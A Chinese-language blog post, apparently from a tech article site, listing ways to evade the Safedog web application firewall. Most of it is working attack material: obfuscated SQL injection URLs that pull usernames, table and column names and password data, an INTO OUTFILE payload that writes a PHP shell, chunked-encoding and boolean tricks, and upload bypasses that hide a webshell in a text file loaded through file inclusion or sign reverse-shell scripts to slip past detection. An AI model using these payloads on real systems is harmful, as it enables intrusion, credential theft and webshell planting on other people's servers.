绕过安全狗【后续再更新】

简介: 绕过安全狗【后续再更新】

sql绕过安全狗

get->post

借助burp

内联注释(加一些东西混淆)

看回显获取用户

url.php?id=-1'/*!50000union/*!(select*/1,2,3);
url.php?id=-1'/*!50000union/*!(select*/~1,2,3);
url.php?id=-1'/*!50000union/*!50000/*!(select*/~1,2,3)  
http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,2,user/*!50000(*/))
1' /*!44111union*/ /*!44111select*/ 1, /*!44111user*//*!44111()*/#
1' /*!44111union*/ /*!44111select*/ 1,(/*!44111select*//*!44111password*//*!44111from*//*!44111users*/limit 0,1)#

获取表名

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,user/*!50000(*/),table_name from information_schema.tables where table_schema=database/*!50000(*/))

获取列名

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,user/*!50000(*/),column_name from information_schema.columns where table_name=’users’)

获取数据

http://127.0.0.1/killdog/dog.php?id=-1/*!12322union/*!11111/*!(select*/~1,2,group_concat(username,0x7e,password)from/*!`users`*/)

Getshell

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/1,2,’<?php phpinfo();?>’ into outfile ‘dir’)

chunked编码(分割)

burp功能

其他

'&&true '&&false  ' && true ' && false
'||true '||false   ' || ture  ' ||false
字符型的话也可以通过浮点数 1.0and 1=1 来绕过对and的检测
异或xor

上传绕过安全狗

方法1:

php/asp/aspx/jsp 通用需要借助文件包含(不管是自己构造还是系统就有)

将大马写到txt文件中,命名为dama.txt,再新建一个文本

asp的写入<!-#include file="dama.txt"-> 保存,两文件放到同目录下,反问url/x.asp,然后访问即可

php的写入<?php require_once(dama.txt);?>



方法2:

有的安全狗不是识别内容,而是识别签名,可以使用工具将自己的脚本或者反弹shell的脚本加上签名,就可以绕过。

后面在继续更新。。。


相关文章
|
安全 前端开发 JavaScript
信息服务上线渗透检测网络安全检查报告和解决方案2(安装文件信息泄漏、管理路径泄漏、XSS漏洞、弱口令、逻辑漏洞、终极上传漏洞升级)
信息服务上线渗透检测网络安全检查报告和解决方案2(安装文件信息泄漏、管理路径泄漏、XSS漏洞、弱口令、逻辑漏洞、终极上传漏洞升级)
260 0
|
7月前
|
安全 Ubuntu Linux
「漏洞复现」建议升级!旧版 Cecil 存在路径遍历漏洞!
本文复现了旧版 Cecil 存在的路径遍历漏洞,通过本案例提醒各位读者,赶紧升级或者对外关闭旧版 Cecil,同时提高自身的安全意识,在自己编写代码时,一定要对文件读取的路径进行校验,以防跨目录的任意文件读取漏洞!
|
9月前
|
安全 应用服务中间件 PHP
文件上传解析漏洞,以及检测方式的绕过
文件上传解析漏洞,以及检测方式的绕过
|
9月前
|
存储 安全 网络安全
怎么看服务器是中毒了还是被攻击?以及后续处理方案
怎么看服务器是中毒了还是被攻击?以及后续处理方案
|
开发框架 安全 .NET
记一次绕过安全狗命令执行上线
记一次绕过安全狗命令执行上线
234 1
|
安全 Linux 开发工具
总结,复习,整合命令执行漏洞实现及其绕过(绕过方式大全)
&gt;🍀1复习一下以前的内容 &gt;🍀2总结整合一下过滤方法
268 0
|
SQL 安全 搜索推荐
如何处理网站被植入恶意的一些代码导致的被机房拦截提示
如何处理网站被植入恶意的一些代码导致的被机房拦截提示
302 0
如何处理网站被植入恶意的一些代码导致的被机房拦截提示
|
安全 程序员 PHP
如何修复网站漏洞Discuz被挂马 快照被劫持跳转该如何处理
Discuz 3.4是目前discuz论坛的最新版本,也是继X3.2、X3.3来,最稳定的社区论坛系统。目前官方已经停止对老版本的补丁更新与升级,直接在X3.4上更新了,最近我们SINE安全在对其安全检测的时候,发现网站漏洞,该漏洞是由于用户登录论坛的时候调用的微信接口,导致可以进行任意登录,甚至可以登录到管理员的账号里去。
2278 0